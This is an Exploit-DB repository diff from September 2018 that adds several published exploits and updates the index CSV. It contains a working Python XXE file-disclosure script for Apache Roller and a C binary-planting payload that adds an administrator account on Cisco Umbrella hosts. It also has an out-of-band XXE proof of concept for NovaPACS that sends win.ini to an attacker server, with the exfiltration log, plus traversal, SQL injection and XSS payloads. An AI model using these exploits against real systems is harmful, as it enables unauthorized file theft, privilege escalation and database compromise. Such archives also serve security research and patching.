DB: 2018-09-07

10 changes to exploits/shellcodes

Cisco Umbrella Roaming Client 2.0.168 - Privilege Escalation

FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution

NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)

Tenda ADSL Router D152 - Cross-Site Scripting
Jorani Leave Management 0.6.5 - Cross-Site Scripting
Jorani Leave Management 0.6.5 - 'startdate' SQL Injection
Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)
WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
Online Quiz Maker 1.0 - 'catid' SQL Injection
Logicspice FAQ Script 2.9.7 - Remote Code Execution
PHP File Browser Script 1 - Directory Traversal
Online Quiz Maker 1.0 - 'catid' SQL Injection
D-Link Dir-600M N150 - Cross-Site Scripting
Logicspice FAQ Script 2.9.7 - Remote Code Execution
PHP File Browser Script 1 - Directory Traversal

exploits/hardware/webapps/45342.txt

@@ -0,0 +1,41 @@
+# Exploit Title: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
+# Date: 2018-08-29
+# Exploit Author: Hamit CİBO
+# Vendor Homepage: http://endress.com
+# Software Link: https://www.endress.com/en/Field-instruments-overview/System-Components-Recorder-Data-Manager/wirelesshart-gateway-fieldgate-swg70
+# Version: SWG70 3.X
+# Tested on: Windows
+# CVE :
+
+# PoC
+# Request
+
+POST /fcgi-bin/wgsetcgi HTTP/1.1
+Content-Length: 129
+Content-Type: application/x-www-form-urlencoded
+Referer: {Target}
+Cookie: ********
+Host: {Target}
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.21(KHTML,like Gecko)Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+
+action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Fri, 13 Mar 1970 17:13:58 GMT
+Server: Apache
+Cache-Control: no-cache
+Keep-Alive : timeout=15,max=100
+Connection : Keep-Alive
+Content-Type : text/plain
+Content-Length : 333
+
+root:x:0:0:root:/root:/bin/sh
+ftp:x:11:101:ftp user:/home:/bin/false
+www:x:12:102:www user:/home:/bin/false
+sshd:x:13:100:SSH Server:/var/run/sshd:/bin/false
+service:x:500:100:Service User:/home:/bin/sh

exploits/hardware/webapps/45343.txt

@@ -0,0 +1,17 @@
+# Exploit Title: D-Link Dir-600M N150 - Cross-Site Scripting
+# Date: 2018-09-06
+# Exploit Author: PUNIT DARJI
+# Vendor Homepage: www.dlink.co.in
+# Hardware Link: https://amzn.to/2NUIniO
+# Version: DIR-600M Firmware 3.01
+# Tested on: Windows 7 ultimate
+# CVE: N/A
+
+#POC
+
+Goto your Wifi Router Gateway [i.e: 192.168.X.X ip address of router]
+Go to --> "Advance" --> "Dynamic DNS" --> "Hostname"
+<script>alert("PSYCHO55")</script>
+"Username" --> <script>alert("PunitDarji")</script>
+and hit apply Refresh the page, and you will get the 2 pop-up first
+"PSYCHO55" and second "PunitDarji".

exploits/linux/webapps/45341.py

@@ -0,0 +1,118 @@
+# Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)
+# Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}"
+# Date: 2018-09-05
+# Exploit Author: Marko Jokic
+# Contact: http://twitter.com/_MarkoJokic
+# Vendor Homepage: http://roller.apache.org/
+# Software Link: http://archive.apache.org/dist/roller/
+# Version: < 5.0.3
+# Tested on: Linux Ubuntu 14.04.1
+# CVE : CVE-2014-0030
+
+# This exploit lets you read almost any file on a vulnerable server via XXE vulnerability.
+# There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'.
+# 'SIMPLE' payload will work in most cases and will be used by default, if
+# server errors out, use 'ADVANCED' payload.
+# 'ADVANCED' payload will start local web server and serve malicious XML which
+# will be parsed by a target server.
+# To successfully perform attack with 'ADVANCED' payload, make sure that port
+# you listen on (--lport flag) is accessible out of the network.
+
+#!/usr/bin/env python
+
+import SimpleHTTPServer
+import SocketServer
+import argparse
+import sys
+import threading
+from xml.etree import ElementTree
+import urllib3
+
+import requests
+
+SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [ <!ELEMENT foo ANY>
+<!ENTITY xxe SYSTEM "file://{}">]>
+<methodCall>
+   <methodName>&xxe;</methodName>
+</methodCall>
+"""
+
+ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ENTITY % start "<![CDATA[">
+<!ENTITY % xxe SYSTEM "file://{}">
+<!ENTITY % end "]]>">
+<!ENTITY % dtd SYSTEM "{}">
+%dtd;
+]>
+<methodCall>
+   <methodName>&all;</methodName>
+</methodCall>
+"""
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
+    def do_GET(self):
+        self.send_response(200)
+        self.send_header('Content-Type', 'text/html')
+        self.end_headers()
+        self.wfile.write('<!ENTITY all "%start;%xxe;%end;">')
+
+def check_exploit(host):
+    response = requests.post(host + "/roller-services/xmlrpc", verify=False)
+    if response.status_code == 200:
+        return True
+    return False
+
+def exploit(host, payload):
+    response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False)
+    xml_tree = ElementTree.fromstring(response.text)
+    parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text
+    print parsed_response
+
+def start_web_server(port):
+    handler = MyHandler
+    httpd = SocketServer.TCPServer(('', port), handler, False)
+    httpd.allow_reuse_address = True
+    httpd.server_bind()
+    httpd.server_activate()
+    httpd.handle_request()
+    httpd.shutdown()
+
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL")
+    parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server")
+    parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server")
+    parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on")
+    args = parser.parse_args()
+
+    host = args.url
+    full_file_path = args.file
+
+    advanced = False
+    lhost = args.lhost
+    lport = args.lport
+
+    if lport is not None and lport is not None:
+        advanced = True
+
+    check = check_exploit(host)
+
+    if check:
+        if advanced:
+            th = threading.Thread(target=start_web_server, args=(lport,))
+            th.daemon = True
+            th.start()
+
+            payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport))
+        else:
+            payload = SIMPLE_PAYLOAD.format(full_file_path)
+
+        exploit(host, payload)
+    else:
+        print "[-] TARGET IS NOT VULNERABLE!"
+
+main()

exploits/php/webapps/45323.txt

@@ -18,7 +18,7 @@
 # Request(POST):
 
 POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
-Host: www.hscripts.com
+Host: server
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
 Firefox/52.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@@ -54,14 +54,14 @@ uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706
 # Request(POST):
 
 POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
-Host: www.hscripts.com
+Host: server
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
 Firefox/52.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate, br
 Referer:
-https://www.hscripts.com/scripts/php/quiz-system/admin/add-category.php
+https://server/admin/add-category.php
 Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1

exploits/php/webapps/45326.txt

@@ -30,14 +30,14 @@
 POST
 /admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en
 HTTP/1.1
-Host: faq-script.logicspice.com
+Host: server
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
 Firefox/52.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer:
-http://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter
+http://server/admin/faqs/edit/eine-frage-fuer-onkel-peter
 Cookie: __asc=3c88bfff1659e6148e6168c52d2;
 __auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501;
 _gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W;

exploits/php/webapps/45338.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Jorani Leave Management System 0.6.5 – Cross-Site Scripting
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-09-06
+# Google Dork: N/A
+# Vendor: Benjamin BALET
+# Software Link: https://jorani.org/download.html
+# Affected Version: 0.6.5 and possibly before
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: Windows
+# Tested on: Win10x64 & Kali Linux
+# CVE: 2018-15917
+  
+# 1. Technical Description:
+# Language parameter is vulnerable to Persistent Cross-Site Scripting (XSS) attacks through
+# a GET request in which the values are stored in the user session.
+  
+# 2. Proof Of Concept (PoC):
+# Go to http://localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue=
+ 
+# 3. Payload:
+# en"><script>alert('PoC CVE-2018-15917')</script>
+
+# 6. Reference:
+# https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/
+# https://github.com/bbalet/jorani/issues/254

exploits/php/webapps/45340.txt

@@ -0,0 +1,70 @@
+# Exploit Title: Jorani Leave Management 0.6.5 – 'startdate' SQL Injection
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-09-06
+# Google Dork: N/A
+# Vendor: Benjamin BALET
+# Software Link: https://jorani.org/download.html
+# Affected Version: 0.6.5 and possibly before
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: Windows
+# Tested on: Win10x64 & Kali Linux
+# CVE: 2018-15918
+# Reference:
+# https://hackpuntes.com/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/
+# https://github.com/bbalet/jorani/issues/254
+  
+# 1. Technical Description:
+# Jorani Leave Management System 0.6.5 and possibly before are affected by SQL Injection in startdate
+# and enddate parameters through POST request in "/leaves/validate" resource.
+# This allows a user of the application without permissions to read and modify sensitive information from
+# the database used by the application.
+  
+# 2. Proof Of Concept (PoC):
+# 2.1 The following POST request generates an error 500 in the Application (add ' in startdate parameter)
+---
+POST /leaves/validate HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/leaves/create
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 167
+Cookie: csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd; jorani_session=r8ofjpch4g93t6563t7ols6fBkeeommo;
+Connection: close
+
+csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd&id=1&type=compensate&startdate=2018-08-02'&enddate=2018-08-03
+&startdatetype=Morning&enddatetype=Afternoon&leave_id=
+---
+
+# 2.2 In another request, add two ' to receive a code 200 OK
+---
+POST /leaves/validate HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/leaves/create
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 167
+Cookie: csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd; jorani_session=r8ofjpch4g93t6563t7ols6fBkeeommo;
+Connection: close
+
+csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd&id=1&type=compensate&startdate=2018-08-02''&enddate=2018-08-03
+&startdatetype=Morning&enddatetype=Afternoon&leave_id=
+---
+ 
+# 3. Payload:
+# Parameters: startdate and enddate (POST)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload:
+id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03') AND (SELECT 2138 FROM (SELECT COUNT(*),CONCAT(0x7178787071,
+(SELECT (ELT(2138=2138,1))),0x716b716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
+('WfLI'='WfLI&startdatetype=Morning&enddatetype=Afternoon&leave_id=

exploits/windows_x86-64/local/45339.c

@@ -0,0 +1,53 @@
+/*
+# Exploit Title: Cisco Umbrella Roaming Client 2.0.168 - Privilege Escalation
+# Date: 2018-04-06
+# Exploit Author: paragonsec @ Critical Start
+# Vendor Homepage: https://www.opendns.com/
+# Version: Umbrella Roaming Client (2.0.168)
+# Tested on: Windows 10 Professional
+# CVE : CVE-2018-0437 & CVE-2018-0438
+# Cisco Bug: CSCvj61300
+# Advisory Links:
+# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-priv
+# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-file-read
+# https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvj61300
+
+OpenDNS Umbrella Roaming Client (2.0.168) Binary Planting Privilege Escalation Exploit
+
+Details:
+Compile the following code and rename it to either netsh.exe or cmd.exe
+and place the file in the "C:\ProgramData\OpenDNS\ERC\" directory. Restart the machine!
+ 
+Affected Binary paths:
+C:\ProgramData\OpenDNS\ERC\cmd.exe
+C:\ProgramData\OpenDNS\ERC\netsh.exe
+
+More Details:
+Create malicious MSI file named RoamingClient_WIN_2.0.168.msi and place in
+"C:\ProgramData\OpenDNS\ERC\Upgrades\" and restart the machine.
+
+Tools Used:
+ìAdvanced Installer 14.8" - Used to create the MSI
+ 
+Code:
+*/
+ 
+#include <stdlib.h>
+#include <stdio.h>
+ 
+int main()
+{
+    system("net user pwnage pwnage /add");
+    system("net localgroup administrators pwnage /add");
+	
+    FILE * fp;
+    int i;
+    /* open the file for writing*/
+    fp = fopen ("c:\\opendns_pwnage.txt","w");
+ 
+    fprintf (fp, "OpenDNS has been Pwned... New user has been created as an admin!\nBrought to you by paragonsec @criticalstart");
+ 
+    /* close the file*/  
+    fclose (fp);
+    return 0;
+}

exploits/windows_x86/webapps/45296.txt

@@ -23,4 +23,7 @@ CGA80WOA.FON=CGA80WOA.FON
 CGA40WOA.FON=CGA40WOA.FON
  
 wave=mmdrv.dll
-timer=timer.drv
+timer=timer.drv
+
+# https://vimeo.com/287115273
+# Greetz: ***Greetz: indoushka | Eduardo | GGA***

exploits/xml/webapps/45337.txt

@@ -0,0 +1,38 @@
+# Title: NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Date: 2018-09-07
+# Vendor: NovaRad Corporation
+# Product web page: https://www.novarad.net
+# Affected version: 8.5.19.75 (Diagnostics Viewer, Study Browser)
+# Tested on: Microsoft Windows 7 Professional SP1 (EN)
+# Advisory ID: ZSL-2018-5488
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5488.php
+# CVE: N/A
+
+# Desc: NovaPACS suffers from an unauthenticated XML External Entity
+# (XXE) injection vulnerability using the DTD parameter entities technique
+# resulting in disclosure and retrieval of arbitrary data from the affected
+# node via out-of-band (OOB) channel attack. The vulnerability is triggered
+# when importing XML format preferences within the settings submenu.
+
+# PoC
+# Malicious.xml:
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<!DOCTYPE ZSL [
+<!ENTITY % remote SYSTEM "http://10.0.1.230:8080/xxe.xml">
+%remote;
+%root;
+%oob;]>
+
+# Attacker's xxe.xml:
+
+<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
+<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://10.0.1.230:8080/?%payload;'> ">
+
+Data retrieval:
+
+lqwrm@metalgear:~$ python -m SimpleHTTPServer 8080
+Serving HTTP on 0.0.0.0 port 8080 ...
+10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /xxe.xml HTTP/1.1" 200 -
+10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1%0D%0A[MCI%20Extensions.BAK]%0D%0A3g2=MPEGVideo%0D%0A3gp=MPEGVideo%0D%0A3gp2=MPEGVideo%0D%0A3gpp=MPEGVideo%0D%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo%0D%0Amod=MPEGVideo%0D%0Amov=MPEGVideo%0D%0Amp4=MPEGVideo%0D%0Amp4v=MPEGVideo%0D%0Amts=MPEGVideo%0D%0Ats=MPEGVideo%0D%0Atts=MPEGVideo%0D%0A[FIX%20DMACS]%0D%0AMinAfterStartup=0 HTTP/1.1" 200 -

files_exploits.csv

@@ -9903,6 +9903,7 @@ id,file,description,date,author,type,platform,port
 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
+45339,exploits/windows_x86-64/local/45339.c,"Cisco Umbrella Roaming Client 2.0.168 - Privilege Escalation",2018-09-06,ParagonSec,local,windows_x86-64,
 45101,exploits/windows/local/45101.py,"Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)",2018-07-30,"Shubham Singh",local,windows,
 45120,exploits/windows/local/45120.py,"Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)",2018-08-01,"Shubham Singh",local,windows,
 45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
@@ -16746,7 +16747,7 @@ id,file,description,date,author,type,platform,port
 45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
 45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80
 45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80
-45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware,
+45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware,9100
 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
@@ -37807,6 +37808,7 @@ id,file,description,date,author,type,platform,port
 43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,
 43733,exploits/java/webapps/43733.rb,"Primefaces 5.x - Remote Code Execution (Metasploit)",2018-01-18,"Bjoern Schuette",webapps,java,
 43777,exploits/php/webapps/43777.py,"GitStack 2.3.10 - Remote Code Execution",2018-01-18,"Kacper Szurek",webapps,php,
+45337,exploits/xml/webapps/45337.txt,"NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)",2018-09-06,LiquidWorm,webapps,xml,
 43789,exploits/php/webapps/43789.txt,"Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection	 (PoC)",2003-12-15,"GulfTech Security",webapps,php,
 43790,exploits/php/webapps/43790.txt,"Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC)",2003-12-16,"GulfTech Security",webapps,php,
 43791,exploits/php/webapps/43791.txt,"Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities",2003-12-16,"GulfTech Security",webapps,php,
@@ -39665,7 +39667,7 @@ id,file,description,date,author,type,platform,port
 44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
 44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp,
 44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,
-45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware,
+45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware,80
 44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php,
 44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux,
 44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux,
@@ -39836,6 +39838,10 @@ id,file,description,date,author,type,platform,port
 45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
 45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux,
 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
+45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80
+45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80
+45341,exploits/linux/webapps/45341.py,"Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)",2018-09-06,"Marko Jokic",webapps,linux,
+45342,exploits/hardware/webapps/45342.txt,"WirelessHART Fieldgate SWG70 3.0 - Directory Traversal",2018-09-06,"Hamit CİBO",webapps,hardware,
 45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
 45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux,
 45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
@@ -39914,8 +39920,9 @@ id,file,description,date,author,type,platform,port
 45314,exploits/php/webapps/45314.txt,"DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)",2018-08-31,Autism_JH,webapps,php,
 45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,
 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80
-45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,
-45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php,
-45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php,
+45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,80
+45343,exploits/hardware/webapps/45343.txt,"D-Link Dir-600M N150 - Cross-Site Scripting",2018-09-06,"PUNIT DARJI",webapps,hardware,
+45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php,80
+45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php,443
 45328,exploits/php/webapps/45328.txt,"Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection",2018-09-04,"Renos Nikolaou",webapps,php,
 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,